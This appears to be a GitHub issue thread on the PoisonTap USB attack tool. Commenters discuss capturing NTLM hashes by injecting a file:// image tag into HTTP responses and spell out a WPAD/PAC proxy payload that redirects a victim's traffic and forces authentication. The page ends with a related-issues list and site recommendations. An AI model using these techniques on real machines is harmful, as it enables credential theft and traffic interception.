Comments (7)
just wanted to say i love your work!
from poisontap.
@Oneiroi @samyk
Although this discussion is a bit outdated: Unfortunately the WPAD Auth attack isn't working since MS16-112 and never worked on non-domain joined boxes. But with the approach of @samyk something new comes into mind:
As code could be injected into nearly every HTTP response, something like <img src="file://PoisonTapIP/">
would initiate a request to an SMB share. If the SMB Server would be backed by responder, NTLM hashes of windows machines will be captured (with known challenge) an could be cracked offline. Right now I'm working on exactly this and had to extend some Responder features which are pending in a PR (see issue here for details).
The project isn't ready to be released, but right now I'm already able to do some nifty things, which maybe could be nice features for PoisonTap, too. These are:
- Providing a Plug'n'Play RNDIS device to most Windows 7/8/10 hosts (no manual driver installation)
- Providing a CDC ECM interface to Linux
- Runtime detection of active interface and thus single DHCP config for both, ECM and RNDIS
- HTTP request pawning, based on @samyk approach of 1 Bit netmask
As I'm using a hand build composite gadget I plan to add in HID support, which needs testing - as I don't want to destroy the Plug'n'Play capability.
So as the needed Responder patches are already sent with a PR, you're maybe interested.
Another idea is to use nmap for target OS discovery, with the shortcoming raising boot time of the Pi - so this has to be tested, too.
from poisontap.
Great idea! I haven't tried it, but agree supporting WPAD on the DHCP and DNS server would be great...in fact, by injecting a PAC, you could then get the user to send all of their HTTPS URLs back to the attacker.
from poisontap.
You just need to answer DNS A requests for WPAD.*
With an http server listening at the IP and responding to GET requests for /wpad.dat
Respond with content-type set to: application/x-ns-proxy-autoconfig
and the PAC:
function FindProxyForURL(url, host){ return 'PROXY proxyhost:3141; DIRECT'; }
You could also force NTLM authentication when the wpad is requested and other fun things. https://github.com/lgandx/Responder
from poisontap.
The reason I mention DHCP is that A) typically the WPAD DNS request is only done on browser startup in my understanding and in our case the browser is already open, and B) it's possible the DNS server is pointing to a local IP, meaning PoisonTap will never see those WPAD DNS requests (PoisonTap can only then interfere with the HTTP communication to the public IPs that are ultimately resolved by the internal DNS server), however PoisonTap does still have the ability to include WPAD during the DHCP response.
from poisontap.
Presumably you have seen the work from mubix https://room362.com/post/2016/snagging-creds-from-locked-machines/ ? that uses WPAD via responder (https://github.com/SpiderLabs/Responder) to carry out the attack
from poisontap.
I'm still cleaning my scripts to bring my (now called P4wnP1) project online. I want to kindly ask you to review the "Modification to PoisonTap approach of fetching traffic to the whole IPv4 address range" section of my README, because I want to make sure you don't have any implications with it.
from poisontap.
Related Issues (20)
- No auto-Response from browser even ip address is successfully obtained (Mac)
- Backend_server not working HOT 4
- PoisonTap server running on LAN HOT 1
- IPv6? HOT 1
- Cookies file not generated on poisontap HOT 2
- target_backdoor.js HOT 4
- Help with Cookies log HOT 1
- Not working while locked on windows 10, works fine when unlocked HOT 1
- DnsSpoof
- Defense against PoisonTap HOT 1
- can you delete saved cookies from the file?
- Is it still working now? HOT 1
- Issue - 1.0.0.1 Help HOT 1
- Cookies not Siphoned HOT 1
- Can't reconnect to pi after PoisonTap is executed HOT 1
- Ki HOT 1
- Problem at installing HOT 1
- Flipper Zero HOT 4
- CCS and retrieve cookie files
- Stil learning the basics and need pointers on where to start
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from poisontap.